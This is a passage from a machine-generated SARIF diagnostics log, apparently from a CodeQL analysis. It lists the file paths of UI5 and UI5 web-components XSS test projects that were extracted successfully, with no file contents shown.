aseId":"%SRCROOT%","index":510}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html","uriBaseId":"%SRCROOT%","index":512}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":514}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json","uriBaseId":"%SRCROOT%","index":516}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json","uriBaseId":"%SRCROOT%","index":517}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml","uriBaseId":"%SRCROOT%","index":518}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json","uriBaseId":"%SRCROOT%","index":520}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html","uriBaseId":"%SRCROOT%","index":521}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":522}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":523}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json","uriBaseId":"%SRCROOT%","index":525}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json","uriBaseId":"%SRCROOT%","index":526}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":527}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":528}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":529}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":531}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json","uriBaseId":"%SRCROOT%","index":533}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json","uriBaseId":"%SRCROOT%","index":534}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":535}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":536}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":537}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":538}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":539}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":540}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":541}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":542}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":543}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json","uriBaseId":"%SRCROOT%","index":544}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json","uriBaseId":"%SRCROOT%","index":545}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":546}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":547}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":548}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":549}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":550}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json","uriBaseId":"%SRCROOT%","index":552}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json","uriBaseId":"%SRCROOT%","index":553}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":554}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":556}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":558}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json","uriBaseId":"%SRCROOT%","index":559}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json","uriBaseId":"%SRCROOT%","index":560}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json","uriBaseId":"%SRCROOT%","index":561}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml","uriBaseId":"%SRCROOT%","index":562}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":563}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":564}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":565}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html","uriBaseId":"%SRCROOT%","index":566}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js","uriBaseId":"%SRCROOT%","index":567}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":568}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":569}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json","uriBaseId":"%SRCROOT%","index":570}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json","uriBaseId":"%SRCROOT%","index":571}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml","uriBaseId":"%SRCROOT%","index":572}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":573}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":574}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":575}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html","uriBaseId":"%SRCROOT%","index":576}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":577}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":578}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":579}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json","uriBaseId":"%SRCROOT%","index":580}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json","uriBaseId":"%SRCROOT%","index":581}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":582}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":584}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":586}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":587}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":588}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":589}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/.eslintrc.json","uriBaseId":"%SRCROOT%","index":590}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package-lock.json","uriBaseId":"%SRCROOT%","index":591}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package.json","uriBaseId":"%SRCROOT%","index":592}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/public/index.html","uriBaseId":"%SRCROOT%","index":593}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{